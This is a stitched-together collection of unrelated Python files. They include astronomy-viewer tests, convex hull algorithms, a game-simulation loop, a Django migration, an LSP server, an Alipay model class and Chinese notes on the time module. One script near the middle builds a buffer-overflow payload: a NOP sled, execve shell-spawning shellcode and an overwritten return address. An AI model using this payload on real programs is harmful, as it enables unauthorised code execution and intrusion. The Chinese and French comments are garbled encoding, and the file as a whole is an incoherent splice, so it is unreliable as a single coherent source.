fn = download_file('https://stsci.box.com/shared/static/e3n30l8vr7hkpnuy7g0t8c5nbl70632b.fits', cache=True) # noqa
with fits.open(fn) as hdulist:
specviz2d_helper.load_data(spectrum_2d=hdulist, ext=2, transpose=True)
dc_0 = specviz2d_helper.app.data_collection[0]
assert dc_0.get_component('flux').shape == (3416, 29)
def test_2d_parser_no_unit(specviz2d_helper, mos_spectrum2d):
specviz2d_helper.load_data(mos_spectrum2d, spectrum_2d_label='my_2d_spec')
assert len(specviz2d_helper.app.data_collection) == 2
dc_0 = specviz2d_helper.app.data_collection[0]
assert dc_0.label == 'my_2d_spec 2D'
assert dc_0.get_component('flux').units == ''
dc_1 = specviz2d_helper.app.data_collection[1]
assert dc_1.label == 'Spectrum 1D'
assert dc_1.get_component('flux').units == dc_0.get_component('flux').units
# Also check the coordinates info panels.
viewer_2d = specviz2d_helper.app.get_viewer('spectrum-2d-viewer')
label_mouseover = specviz2d_helper.app.session.application._tools['g-coords-info']
label_mouseover._viewer_mouse_event(viewer_2d,
{'event': 'mousemove', 'domain': {'x': 0, 'y': 0}})
assert label_mouseover.as_text() == ('Pixel x=00000.0 y=00000.0 Value +3.74540e-01', '', '')
assert label_mouseover.icon == 'a'
viewer_1d = specviz2d_helper.app.get_viewer('spectrum-viewer')
# need to trigger a mouseleave or mouseover to reset the traitlets
label_mouseover._viewer_mouse_event(viewer_1d, {'event': 'mouseenter'})
label_mouseover._viewer_mouse_event(viewer_1d,
{'event': 'mousemove', 'domain': {'x': 7.2e-6, 'y': 3}})
assert label_mouseover.as_text() == ('Cursor 7.20000e-06, 3.00000e+00',
'Wave 7.00000e-06 m (6 pix)',
'Flux -3.59571e+00')
assert label_mouseover.icon == 'b'
def test_1d_parser(specviz2d_helper, spectrum1d):
specviz2d_helper.load_data(spectrum_1d=spectrum1d)
assert len(specviz2d_helper.app.data_collection) == 1
dc_0 = specviz2d_helper.app.data_collection[0]
assert dc_0.label == 'Spectrum 1D'
assert dc_0.meta['uncertainty_type'] == 'std'
def test_2d_1d_parser(specviz2d_helper, mos_spectrum2d, spectrum1d):
specviz2d_helper.load_data(spectrum_2d=mos_spectrum2d, spectrum_1d=spectrum1d)
assert specviz2d_helper.app.data_collection.labels == ['Spectrum 2D', 'Spectrum 1D']
def test_parser_no_data(specviz2d_helper):
with pytest.raises(ValueError, match='Must provide spectrum_2d or spectrum_1d'):
specviz2d_helper.load_data()
|
# To do: Briefs, Parameters and beta test
"""
Problem:
https://en.wikipedia.org/wiki/Convex_hull
Solutions:
Brute force
DnC
"""
from typing import Iterable, List, Set, Union
class Point:
"""
Examples
--------
>>> Point(1, 2)
(1.0, 2.0)
>>> Point("1", "2")
(1.0, 2.0)
>>> Point(1, 2) > Point(0, 1)
True
>>> Point(1, 1) == Point(1, 1)
True
>>> Point(-0.5, 1) == Point(0.5, 1)
False
>>> Point("pi", "e")
Traceback (most recent call last):
...
ValueError: could not convert string to float: 'pi'
"""
def __init__(self, x, y):
self.x, self.y = float(x), float(y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def __ne__(self, other):
return not self == other
def __gt__(self, other):
if self.x > other.x:
return True
elif self.x == other.x:
return self.y > other.y
return False
def __lt__(self, other):
return not self > other
def __ge__(self, other):
if self.x > other.x:
return True
elif self.x == other.x:
return self.y >= other.y
return False
def __le__(self, other):
if self.x < other.x:
return True
elif self.x == other.x:
return self.y <= other.y
return False
def __repr__(self):
return f"({self.x}, {self.y})"
def __hash__(self):
return hash(self.x)
def _construct_points(
list_of_tuples: Union[List[Point], List[List[float]], Iterable[List[float]]]
) -> List[Point]:
"""
Examples
-------
>>> _construct_points([[1, 1], [2, -1], [0.3, 4]])
[(1.0, 1.0), (2.0, -1.0), (0.3, 4.0)]
>>> _construct_points([1, 2])
Ignoring deformed point 1. All points must have at least 2 coordinates.
Ignoring deformed point 2. All points must have at least 2 coordinates.
[]
>>> _construct_points([])
[]
>>> _construct_points(None)
[]
"""
points: List[Point] = []
if list_of_tuples:
for p in list_of_tuples:
if isinstance(p, Point):
points.append(p)
else:
try:
points.append(Point(p[0], p[1]))
except (IndexError, TypeError):
print(
f"Ignoring deformed point {p}. All points"
" must have at least 2 coordinates."
)
return points
def _validate_input(points: Union[List[Point], List[List[float]]]) -> List[Point]:
"""
Examples
-------
>>> _validate_input([[1, 2]])
[(1.0, 2.0)]
>>> _validate_input([(1, 2)])
[(1.0, 2.0)]
>>> _validate_input([Point(2, 1), Point(-1, 2)])
[(2.0, 1.0), (-1.0, 2.0)]
>>> _validate_input([])
Traceback (most recent call last):
...
ValueError: Expecting a list of points but got []
>>> _validate_input(1)
Traceback (most recent call last):
...
ValueError: Expecting an iterable object but got an non-iterable type 1
"""
if not hasattr(points, "__iter__"):
raise ValueError(
f"Expecting an iterable object but got an non-iterable type {points}"
)
if not points:
raise ValueError(f"Expecting a list of points but got {points}")
return _construct_points(points)
def _det(a: Point, b: Point, c: Point) -> float:
"""
Examples
----------
>>> _det(Point(1, 1), Point(1, 2), Point(1, 5))
0.0
>>> _det(Point(0, 0), Point(10, 0), Point(0, 10))
100.0
>>> _det(Point(0, 0), Point(10, 0), Point(0, -10))
-100.0
"""
det = (a.x * b.y + b.x * c.y + c.x * a.y) - (a.y * b.x + b.y * c.x + c.y * a.x)
return det
def convex_hull_bf(points: List[Point]) -> List[Point]:
"""
Examples
---------
>>> convex_hull_bf([[0, 0], [1, 0], [10, 1]])
[(0.0, 0.0), (1.0, 0.0), (10.0, 1.0)]
>>> convex_hull_bf([[0, 0], [1, 0], [10, 0]])
[(0.0, 0.0), (10.0, 0.0)]
>>> convex_hull_bf([[-1, 1],[-1, -1], [0, 0], [0.5, 0.5], [1, -1], [1, 1],
... [-0.75, 1]])
[(-1.0, -1.0), (-1.0, 1.0), (1.0, -1.0), (1.0, 1.0)]
>>> convex_hull_bf([(0, 3), (2, 2), (1, 1), (2, 1), (3, 0), (0, 0), (3, 3),
... (2, -1), (2, -4), (1, -3)])
[(0.0, 0.0), (0.0, 3.0), (1.0, -3.0), (2.0, -4.0), (3.0, 0.0), (3.0, 3.0)]
"""
points = sorted(_validate_input(points))
n = len(points)
convex_set = set()
for i in range(n - 1):
for j in range(i + 1, n):
points_left_of_ij = points_right_of_ij = False
ij_part_of_convex_hull = True
for k in range(n):
if k != i and k != j:
det_k = _det(points[i], points[j], points[k])
if det_k > 0:
points_left_of_ij = True
elif det_k < 0:
points_right_of_ij = True
else:
# point[i], point[j], point[k] all lie on a straight line
# if point[k] is to the left of point[i] or it's to the
# right of point[j], then point[i], point[j] cannot be
# part of the convex hull of A
if points[k] < points[i] or points[k] > points[j]:
ij_part_of_convex_hull = False
break
if points_left_of_ij and points_right_of_ij:
ij_part_of_convex_hull = False
break
if ij_part_of_convex_hull:
convex_set.update([points[i], points[j]])
return sorted(convex_set)
def convex_hull_recursive(points: List[Point]) -> List[Point]:
"""
Examples
---------
>>> convex_hull_recursive([[0, 0], [1, 0], [10, 1]])
[(0.0, 0.0), (1.0, 0.0), (10.0, 1.0)]
>>> convex_hull_recursive([[0, 0], [1, 0], [10, 0]])
[(0.0, 0.0), (10.0, 0.0)]
>>> convex_hull_recursive([[-1, 1],[-1, -1], [0, 0], [0.5, 0.5], [1, -1], [1, 1],
... [-0.75, 1]])
[(-1.0, -1.0), (-1.0, 1.0), (1.0, -1.0), (1.0, 1.0)]
>>> convex_hull_recursive([(0, 3), (2, 2), (1, 1), (2, 1), (3, 0), (0, 0), (3, 3),
... (2, -1), (2, -4), (1, -3)])
[(0.0, 0.0), (0.0, 3.0), (1.0, -3.0), (2.0, -4.0), (3.0, 0.0), (3.0, 3.0)]
"""
points = sorted(_validate_input(points))
n = len(points)
left_most_point = points[0]
right_most_point = points[n - 1]
convex_set = {left_most_point, right_most_point}
upper_hull = []
lower_hull = []
for i in range(1, n - 1):
det = _det(left_most_point, right_most_point, points[i])
if det > 0:
upper_hull.append(points[i])
elif det < 0:
lower_hull.append(points[i])
_construct_hull(upper_hull, left_most_point, right_most_point, convex_set)
_construct_hull(lower_hull, right_most_point, left_most_point, convex_set)
return sorted(convex_set)
def _construct_hull(
points: List[Point], left: Point, right: Point, convex_set: Set[Point]
) -> None:
"""
Parameters
...
"""
if points:
extreme_point = None
extreme_point_distance = float("-inf")
candidate_points = []
for p in points:
det = _det(left, right, p)
if det > 0:
candidate_points.append(p)
if det > extreme_point_distance:
extreme_point_distance = det
extreme_point = p
if extreme_point:
_construct_hull(candidate_points, left, extreme_point, convex_set)
convex_set.add(extreme_point)
_construct_hull(candidate_points, extreme_point, right, convex_set)
def convex_hull_melkman(points: List[Point]) -> List[Point]:
"""
Examples
>>> convex_hull_melkman([[0, 0], [1, 0], [10, 1]])
[(0.0, 0.0), (1.0, 0.0), (10.0, 1.0)]
>>> convex_hull_melkman([[0, 0], [1, 0], [10, 0]])
[(0.0, 0.0), (10.0, 0.0)]
>>> convex_hull_melkman([[-1, 1],[-1, -1], [0, 0], [0.5, 0.5], [1, -1], [1, 1],
... [-0.75, 1]])
[(-1.0, -1.0), (-1.0, 1.0), (1.0, -1.0), (1.0, 1.0)]
>>> convex_hull_melkman([(0, 3), (2, 2), (1, 1), (2, 1), (3, 0), (0, 0), (3, 3),
... (2, -1), (2, -4), (1, -3)])
[(0.0, 0.0), (0.0, 3.0), (1.0, -3.0), (2.0, -4.0), (3.0, 0.0), (3.0, 3.0)]
"""
points = sorted(_validate_input(points))
n = len(points)
convex_hull = points[:2]
for i in range(2, n):
det = _det(convex_hull[1], convex_hull[0], points[i])
if det > 0:
convex_hull.insert(0, points[i])
break
elif det < 0:
convex_hull.append(points[i])
break
else:
convex_hull[1] = points[i]
i += 1
for i in range(i, n):
if (
_det(convex_hull[0], convex_hull[-1], points[i]) > 0
and _det(convex_hull[-1], convex_hull[0], points[1]) < 0
):
# The point lies within the convex hull
continue
convex_hull.insert(0, points[i])
convex_hull.append(points[i])
while _det(convex_hull[0], convex_hull[1], convex_hull[2]) >= 0:
del convex_hull[1]
while _det(convex_hull[-1], convex_hull[-2], convex_hull[-3]) <= 0:
del convex_hull[-2]
# `convex_hull` is contains the convex hull in circular order
return sorted(convex_hull[1:] if len(convex_hull) > 3 else convex_hull)
def main():
points = [
(0, 3),
(2, 2),
(1, 1),
(2, 1),
(3, 0),
(0, 0),
(3, 3),
(2, -1),
(2, -4),
(1, -3),
]
# the convex set of points is
# [(0, 0), (0, 3), (1, -3), (2, -4), (3, 0), (3, 3)]
results_bf = convex_hull_bf(points)
results_recursive = convex_hull_recursive(points)
assert results_bf == results_recursive
results_melkman = convex_hull_melkman(points)
assert results_bf == results_melkman
print(results_bf)
if __name__ == "__main__":
main() |
"""
Contains the Game Interface class.
"""
import sys
import pygame as pg
from game import *
""" Import Multiple AIs """
total_trial = 1000
class Game_Count(Game):
def __init__(self):
super().__init__(mute = True)
def reset(self):
self.close = False
self.winner = None
self.all_sprites = pg.sprite.Group()
self.players = [Plane(playerlist[0], 0, p1_init_pos.copy(), mute = self.mute),
Plane(playerlist[1], 1, p2_init_pos.copy(), mute = self.mute)]
self.players[0].enemy = self.players[1]
self.players[1].enemy = self.players[0]
self.playerdisplay = [Player(self.players[0], self.PlaneImg[0], (128, 220, 32)),
Player(self.players[1], self.PlaneImg[1], (220, 64, 64))]
for _ in self.playerdisplay:
self.all_sprites.add(_)
def run(self, record = False, count = 0):
while not self.close and self.winner == None:
self.event_loop()
self.update()
self.draw()
if record:
fname = "result/winimg" + str(count) + ".png"
pg.image.save(self.screen, fname)
hp1 = self.players[0].hp
hp2 = self.players[1].hp
crashed = False
if self.players[0].crashed:
hp1 = 0
crashed = True
if self.players[1].crashed:
hp2 = 0
crashed = True
return (self.winner, hp1, hp2, crashed)
# while not self.close:
# self.event_loop()
def main():
game = Game_Count()
winner = [0, 0]
for trial_count in range(total_trial):
game.reset()
print('Game #{} Running ... '.format(trial_count), end = '')
res, hp1, hp2, crashed = game.run(record = trial_count % 20 == 0, count = trial_count)
if game.close:
break
if hp1 > hp2 and playerlist[0] == PlayerState.AI_RL or hp1 < hp2 and playerlist[1] == PlayerState.AI_RL:
print('AI_RL wins with', '{}:{}'.format(hp1, hp2), end = '')
if crashed:
print(' due to crashing')
else:
print()
winner[0] += 1
else:
print('AI_HC wins with', '{}:{}'.format(hp1, hp2), end = '')
if crashed:
print(' due to crashing')
else:
print()
winner[1] += 1
if random.random() >= 0.5:
playerlist[0], playerlist[1] = playerlist[1], playerlist[0]
if winner[0] > winner[1]:
argmax = 0
else:
argmax = 1
print('Player', argmax + 1, 'wins', winner[argmax], 'of', total_trial, 'matches')
pg.quit()
sys.exit()
'''
Check if main.py is the called program.
'''
if __name__ == '__main__':
main()
|
# Cette programme prends les rรฉsultats d'un vote comme donnรฉes et retourne le rรฉsultat:
# unanimitรฉ, majoritรฉ claire, majoritรฉ simple, la motion ne passe pas. Un fonction est
# utiliser pour calculer le pourcentage et les conditions dรฉtermine la rรฉsultat.
def vote_pourcentage(ch):
''' paramรจtres (un chaรฎne des charactรจre) et retourne un float
Cet fonction utilise les modules dรฉfinies dans la documentation pour les chaรฎnes
des charactรจres pour conter le nombre des oui ou non. Utilisant cette information,
Il est alors possible ร calculer le pourcentage des voteurs actives qui pense que
la motion devrait passer. La fonction retourne cette pourcentage. Les abstentions
ne sont pas calculรฉes. '''
# La programme conte le nombre des 'oui''s et des 'non''s
nOui = float(ch.count('oui'))
nNon = float(ch.count('non'))
# On calcule le pourcentage des oui de toutes les gens qui on votรฉ oui, ou non
pourcentage = nOui/(nOui+nNon)
return pourcentage
# Ici, la program demande l'utilisateur pour les resultats du vote
votes = input('''Entrez les votes (oui, non, ou abstention) sรฉparรฉs par des espaces, et ร la
fin appuyez enter: ''')
# La fonction est appรจlรฉ
p = vote_pourcentage(votes)
# On compare la pourcentage calculรฉ avec les dรฉfinitions pour dรฉterminer si la motion est
# passรฉ.
if(p == 1):
print('unanimitรฉ')
elif (p >= 2/3):
print('majoritรฉ claire')
elif (p >= 1/2):
print('majoritรฉ simple')
else:
print('la motion ne passe pas')
|
import turtle
colors=["red","blue","purple","green","orange","pink"]
t=turtle.Pen()
turtle.bgcolor("black")
for x in range(360):
t.pencolor(colors[x%len(colors)])
t.width(x/100+1)
t.forward(x)
t.left(59) |
# Generated by Django 3.0.3 on 2020-10-25 01:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('bagel_site', '0012_auto_20201025_0036'),
]
operations = [
migrations.AlterField(
model_name='lineitem',
name='associated_line_item',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='lineitem', to='bagel_site.LineItem'),
),
]
|
import codecs
n = 10**8
primes = []
for i in codecs.open('prime.txt', 'r', 'utf-8'):
if int(i.strip()) < n:
primes.append(int(i))
else:
break
print ('read primes over')
d = {}
for i, p in enumerate(primes):
if i % 100 == 0:
print (i, p)
k = 0
for kk in range(p, n+1, p):
x = kk
while x > 0 and x % p == 0:
x //= p
k += 1
if p**k > n:
break
d[p**k] = kk
if p**k > n:
break
print ('d cal over')
def divisior(x):
ans = -1
for i, p in enumerate(primes):
if x < p or x <= 1:
break
if x % p == 0:
k = p
while x % k == 0:
k *= p
k //= p
x //= k
if ans == -1:
ans = d[k]
else:
ans = max(d[k], ans)
return ans
def cal():
s = 0
for i in range(2, n+1):
if i % 1000 == 0:
print (i)
s += divisior(i)
print (s)
def cal_2():
myans = [0 for i in range(n+10)]
for i_i, p in enumerate(primes):
if i_i % 100 == 0:
print(i_i, p)
for i in range(p, n+1, p):
x = i
k = p
while x%k == 0:
k *= p
k //= p
if myans[i] == 0:
myans[i] = d[k]
else:
myans[i] = max(myans[i], d[k])
print (sum(myans))
cal_2()
|
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 19 22:19:10 2018
@author: brown
"""
def closest_power(base, num):
'''
base: base of the exponential, integer > 1
num: number you want to be closest to, integer > 0
Find the integer exponent such that base**exponent is closest to num.
Note that the base**exponent may be either greater or smaller than num.
In case of a tie, return the smaller value.
Returns the exponent.
'''
smallestDifference = num
maxRange = num//base
for exp in range(int(maxRange)):
diff = (base**exp) - num
#print('diff ',diff)
if abs(diff) < smallestDifference:
smallestDifference = abs(diff)
# print('smalldiff ',smallestDifference)
ans = exp
# print('ans ',ans)
return ans
print(closest_power(10,550.0)) |
import struct
import sys
offset = struct.pack("Q", 0x7fffffffe5e0)
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
payload = [
b"\x90"*49,
shellcode,
b"\x90"*60,
offset
]
payload = b"".join(payload)
sys.stdout.buffer.write(payload) |
import httplib
httpconn = httplib.HTTPConnection("www-130.ibm.com")
httpconn.request("GET", "/developerworks/index.html")
resp = httpconn.getresponse()
if resp.reason == "OK":
resp_data = resp.read()
print resp_data
httpconn.close()
|
#!/usr/bin/python3
"""
A simple LSP server for "efree", written on pygls, which provides a framework
for writing LSP servers.
efree identifies lower-case "e" in a document and highlights it.
"""
# -------------------------------------------------------------------------------
# Imports
# -------------------------------------------------------------------------------
import logging
# import argparse
from pygls.server import LanguageServer
from pygls.features import (TEXT_DOCUMENT_DID_CHANGE, TEXT_DOCUMENT_DID_CLOSE,
TEXT_DOCUMENT_DID_OPEN, TEXT_DOCUMENT_DID_SAVE)
from pygls.types import (Diagnostic, DidChangeTextDocumentParams,
DidSaveTextDocumentParams, DidCloseTextDocumentParams,
DidOpenTextDocumentParams, Position, Range)
# -------------------------------------------------------------------------------
# Parameters
# -------------------------------------------------------------------------------
logging.basicConfig(filename="logfree.log",
filemode="w",
format='%(asctime)-15s %(levelname)-8s%(message)s',
level=logging.INFO)
server = LanguageServer()
# ----------------------------------------------------------------------------
# Functions
# ----------------------------------------------------------------------------
@server.feature(TEXT_DOCUMENT_DID_OPEN)
async def did_open(ls, params: DidOpenTextDocumentParams):
""" Text document did open notification."""
_validate(ls, params)
logging.info(">>> Event: Text document did open")
@server.feature(TEXT_DOCUMENT_DID_CHANGE)
def did_change(ls, params: DidChangeTextDocumentParams):
"""Text document did change notification."""
_validate(ls, params)
logging.info(">>> Event: Text document did change")
@server.feature(TEXT_DOCUMENT_DID_SAVE)
def did_save(ls, params: DidSaveTextDocumentParams):
"""Text document did save notification."""
logging.info(">>> Event: Text document did save")
@server.feature(TEXT_DOCUMENT_DID_CLOSE)
def did_close(ls, params: DidCloseTextDocumentParams):
"""Text document did close notification."""
_validate(ls, params)
logging.info(">>> Event: Text document did close")
def _validate(ls, params):
"""
Validate a document and publish diagnostics
"""
text_doc = ls.workspace.get_document(params.textDocument.uri)
source = text_doc.source
diagnostics = []
line_index = -1
# test comment
for line in source.splitlines():
logging.debug("*** %s", line)
line_index += 1
col_index = -1
while True:
if col_index == -1:
col_index = str.find(line, "e")
else:
col_index = str.find(line, "e", col_index + 1)
if col_index == -1:
logging.debug("The remainder of line %s is efree", line_index)
break
msg = "Character e at column {}".format(col_index)
d = Diagnostic(Range(Position(line_index, col_index),
Position(line_index, col_index + 1)),
msg,
source=type(server).__name__)
diagnostics.append(d)
logging.debug("e at line %s, col %s", line_index, col_index)
ls.publish_diagnostics(text_doc.uri, diagnostics)
def main():
"""
Entry point: start the language server
"""
logging.info("About to start efree Language Server")
server.start_io()
logging.info("Started efree Language Server")
if __name__ == '__main__':
main()
|
#coding:utf-8
'''
0 4ไฝๆฐๅนด 2008
1 ๆ 1 ๅฐ 12
2 ๆฅ 1ๅฐ31
3 ๅฐๆถ 0ๅฐ23
4 ๅ้
5 ็ง 0ๅฐ61 (60ๆ61 ๆฏ้ฐ็ง)
6 ไธๅจ็็ฌฌๅ ๆฅ 0ๅฐ6 (0ๆฏๅจไธ)
7 ไธๅนด็็ฌฌๅ ๆฅ 1ๅฐ366 (ๅ็ฅๅ)
8 ๅคไปคๆถ -1, 0, 1, -1ๆฏๅณๅฎๆฏๅฆไธบๅคไปคๆถ็ๆๅธ
0 tm_year 2008
1 tm_mon 1 ๅฐ 12
2 tm_mday 1 ๅฐ 31
3 tm_hour 0 ๅฐ 23
4 tm_min 0 ๅฐ 59
5 tm_sec 0 ๅฐ 61 (60ๆ61 ๆฏ้ฐ็ง)
6 tm_wday 0ๅฐ6 (0ๆฏๅจไธ)
7 tm_yday 1 ๅฐ 366(ๅ็ฅๅ)
8 tm_isdst -1, 0, 1, -1ๆฏๅณๅฎๆฏๅฆไธบๅคไปคๆถ็ๆๅธ
'''
#
# *********************** ๆถ้ด Time *******************
#
import time
ticks = time.time()
print ticks
localtime = time.localtime(time.time())
print localtime
print localtime.tm_year, localtime.tm_mon, localtime.tm_mday
print time.asctime(localtime)
import calendar
cal = calendar.month(2008, 1)
print cal
#
# Timeๆจกๅ
#
# Timeๆจกๅๅ
ๅซไบไปฅไธๅ
็ฝฎๅฝๆฐ๏ผๆขๆๆถ้ดๅค็็ธ็๏ผไนๆ่ฝฌๆขๆถ้ดๆ ผๅผ็๏ผ
#
'''
1 time.altzone
่ฟๅๆ ผๆๅจๆฒป่ฅฟ้จ็ๅคไปคๆถๅฐๅบ็ๅ็งป็งๆฐใๅฆๆ่ฏฅๅฐๅบๅจๆ ผๆๅจๆฒปไธ้จไผ่ฟๅ่ดๅผ๏ผๅฆ่ฅฟๆฌง๏ผๅ
ๆฌ่ฑๅฝ๏ผใๅฏนๅคไปคๆถๅฏ็จๅฐๅบๆ่ฝไฝฟ็จใ
2 time.asctime([tupletime])
ๆฅๅๆถ้ดๅ
็ปๅนถ่ฟๅไธไธชๅฏ่ฏป็ๅฝขๅผไธบ"Tue Dec 11 18:07:14 2008"๏ผ2008ๅนด12ๆ11ๆฅ ๅจไบ18ๆถ07ๅ14็ง๏ผ็24ไธชๅญ็ฌฆ็ๅญ็ฌฆไธฒใ
3 time.clock( )
็จไปฅๆตฎ็นๆฐ่ฎก็ฎ็็งๆฐ่ฟๅๅฝๅ็CPUๆถ้ดใ็จๆฅ่กก้ไธๅ็จๅบ็่ๆถ๏ผๆฏtime.time()ๆดๆ็จใ
4 time.ctime([secs])
ไฝ็จ็ธๅฝไบasctime(localtime(secs))๏ผๆช็ปๅๆฐ็ธๅฝไบasctime()
5 time.gmtime([secs])
ๆฅๆถๆถ้ด่พ๏ผ1970็บชๅ
ๅ็ป่ฟ็ๆตฎ็น็งๆฐ๏ผๅนถ่ฟๅๆ ผๆๅจๆฒปๅคฉๆๆถ้ดไธ็ๆถ้ดๅ
็ปtใๆณจ๏ผt.tm_isdstๅง็ปไธบ0
6 time.localtime([secs])
ๆฅๆถๆถ้ด่พ๏ผ1970็บชๅ
ๅ็ป่ฟ็ๆตฎ็น็งๆฐ๏ผๅนถ่ฟๅๅฝๅฐๆถ้ดไธ็ๆถ้ดๅ
็ปt๏ผt.tm_isdstๅฏๅ0ๆ1๏ผๅๅณไบๅฝๅฐๅฝๆถๆฏไธๆฏๅคไปคๆถ๏ผใ
7 time.mktime(tupletime)
ๆฅๅๆถ้ดๅ
็ปๅนถ่ฟๅๆถ้ด่พ๏ผ1970็บชๅ
ๅ็ป่ฟ็ๆตฎ็น็งๆฐ๏ผใ
8 time.sleep(secs)
ๆจ่ฟ่ฐ็จ็บฟ็จ็่ฟ่ก๏ผsecsๆ็งๆฐใ
9 time.strftime(fmt[,tupletime])
ๆฅๆถไปฅๆถ้ดๅ
็ป๏ผๅนถ่ฟๅไปฅๅฏ่ฏปๅญ็ฌฆไธฒ่กจ็คบ็ๅฝๅฐๆถ้ด๏ผๆ ผๅผ็ฑfmtๅณๅฎใ
10 time.strptime(str,fmt='%a %b %d %H:%M:%S %Y')
ๆ นๆฎfmt็ๆ ผๅผๆไธไธชๆถ้ดๅญ็ฌฆไธฒ่งฃๆไธบๆถ้ดๅ
็ปใ
11 time.time( )
่ฟๅๅฝๅๆถ้ด็ๆถ้ดๆณ๏ผ1970็บชๅ
ๅ็ป่ฟ็ๆตฎ็น็งๆฐ๏ผใ
12 time.tzset()
ๆ นๆฎ็ฏๅขๅ้TZ้ๆฐๅๅงๅๆถ้ด็ธๅ
ณ่ฎพ็ฝฎใ
1 time.timezone
ๅฑๆงtime.timezoneๆฏๅฝๅฐๆถๅบ๏ผๆชๅฏๅจๅคไปคๆถ๏ผ่ท็ฆปๆ ผๆๅจๆฒป็ๅ็งป็งๆฐ๏ผ>0๏ผ็พๆดฒ;<=0ๅคง้จๅๆฌงๆดฒ๏ผไบๆดฒ๏ผ้ๆดฒ๏ผใ
2 time.tzname
ๅฑๆงtime.tznameๅ
ๅซไธๅฏนๆ นๆฎๆ
ๅต็ไธๅ่ไธๅ็ๅญ็ฌฆไธฒ๏ผๅๅซๆฏๅธฆๅคไปคๆถ็ๆฌๅฐๆถๅบๅ็งฐ๏ผๅไธๅธฆ็ใ
'''
#
# ๆฅๅๆจกๅ Calendar
#
'''
1 calendar.calendar(year,w=2,l=1,c=6)
่ฟๅไธไธชๅค่กๅญ็ฌฆไธฒๆ ผๅผ็yearๅนดๅนดๅ๏ผ3ไธชๆไธ่ก๏ผ้ด้่ท็ฆปไธบcใ ๆฏๆฅๅฎฝๅบฆ้ด้ไธบwๅญ็ฌฆใๆฏ่ก้ฟๅบฆไธบ21* W+18+2* Cใlๆฏๆฏๆๆ่กๆฐใ
2 calendar.firstweekday( )
่ฟๅๅฝๅๆฏๅจ่ตทๅงๆฅๆ็่ฎพ็ฝฎใ้ป่ฎคๆ
ๅตไธ๏ผ้ฆๆฌก่ฝฝๅ
ฅcaendarๆจกๅๆถ่ฟๅ0๏ผๅณๆๆไธใ
3 calendar.isleap(year)
ๆฏ้ฐๅนด่ฟๅTrue๏ผๅฆๅไธบfalseใ
4 calendar.leapdays(y1,y2)
่ฟๅๅจY1๏ผY2ไธคๅนดไน้ด็้ฐๅนดๆปๆฐใ
5 calendar.month(year,month,w=2,l=1)
่ฟๅไธไธชๅค่กๅญ็ฌฆไธฒๆ ผๅผ็yearๅนดmonthๆๆฅๅ๏ผไธค่กๆ ้ข๏ผไธๅจไธ่กใๆฏๆฅๅฎฝๅบฆ้ด้ไธบwๅญ็ฌฆใๆฏ่ก็้ฟๅบฆไธบ7* w+6ใlๆฏๆฏๆๆ็่กๆฐใ
6 calendar.monthcalendar(year,month)
่ฟๅไธไธชๆดๆฐ็ๅๅฑๅตๅฅๅ่กจใๆฏไธชๅญๅ่กจ่ฃ
่ฝฝไปฃ่กจไธไธชๆๆ็ๆดๆฐใYearๅนดmonthๆๅค็ๆฅๆ้ฝ่ฎพไธบ0;่ๅดๅ
็ๆฅๅญ้ฝ็ฑ่ฏฅๆ็ฌฌๅ ๆฅ่กจ็คบ๏ผไป1ๅผๅงใ
7 calendar.monthrange(year,month)
่ฟๅไธคไธชๆดๆฐใ็ฌฌไธไธชๆฏ่ฏฅๆ็ๆๆๅ ็ๆฅๆ็ ๏ผ็ฌฌไบไธชๆฏ่ฏฅๆ็ๆฅๆ็ ใๆฅไป0๏ผๆๆไธ๏ผๅฐ6๏ผๆๆๆฅ๏ผ;ๆไป1ๅฐ12ใ
8 calendar.prcal(year,w=2,l=1,c=6)
็ธๅฝไบ print calendar.calendar(year,w,l,c).
9 calendar.prmonth(year,month,w=2,l=1)
็ธๅฝไบ print calendar.calendar๏ผyear๏ผw๏ผl๏ผc๏ผใ
10 calendar.setfirstweekday(weekday)
่ฎพ็ฝฎๆฏๅจ็่ตทๅงๆฅๆ็ ใ0๏ผๆๆไธ๏ผๅฐ6๏ผๆๆๆฅ๏ผใ
11 calendar.timegm(tupletime)
ๅtime.gmtime็ธๅ๏ผๆฅๅไธไธชๆถ้ดๅ
็ปๅฝขๅผ๏ผ่ฟๅ่ฏฅๆถๅป็ๆถ้ด่พ๏ผ1970็บชๅ
ๅ็ป่ฟ็ๆตฎ็น็งๆฐ๏ผใ
12 calendar.weekday(year,month,day)
่ฟๅ็ปๅฎๆฅๆ็ๆฅๆ็ ใ0๏ผๆๆไธ๏ผๅฐ6๏ผๆๆๆฅ๏ผใๆไปฝไธบ 1๏ผไธๆ๏ผ ๅฐ 12๏ผ12ๆ๏ผ
'''
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMarketingCampaignRetailDmSetModel(object):
def __init__(self):
self._campaign_end_time = None
self._content_id = None
self._operate_type = None
@property
def campaign_end_time(self):
return self._campaign_end_time
@campaign_end_time.setter
def campaign_end_time(self, value):
self._campaign_end_time = value
@property
def content_id(self):
return self._content_id
@content_id.setter
def content_id(self, value):
self._content_id = value
@property
def operate_type(self):
return self._operate_type
@operate_type.setter
def operate_type(self, value):
self._operate_type = value
def to_alipay_dict(self):
params = dict()
if self.campaign_end_time:
if hasattr(self.campaign_end_time, 'to_alipay_dict'):
params['campaign_end_time'] = self.campaign_end_time.to_alipay_dict()
else:
params['campaign_end_time'] = self.campaign_end_time
if self.content_id:
if hasattr(self.content_id, 'to_alipay_dict'):
params['content_id'] = self.content_id.to_alipay_dict()
else:
params['content_id'] = self.content_id
if self.operate_type:
if hasattr(self.operate_type, 'to_alipay_dict'):
params['operate_type'] = self.operate_type.to_alipay_dict()
else:
params['operate_type'] = self.operate_type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiMarketingCampaignRetailDmSetModel()
if 'campaign_end_time' in d:
o.campaign_end_time = d['campaign_end_time']
if 'content_id' in d:
o.content_id = d['content_id']
if 'operate_type' in d:
o.operate_type = d['operate_type']
return o
|
"""
Multi-file config parser for any library.
Not usually to be used alone, usually you ready from the parser into a settings file.
Changes can be made by creating / updating a ~/.{{file_name}} in your home directory or an /etc/.{{file_name}} file for
system wide settings.
Imports are in the following order:
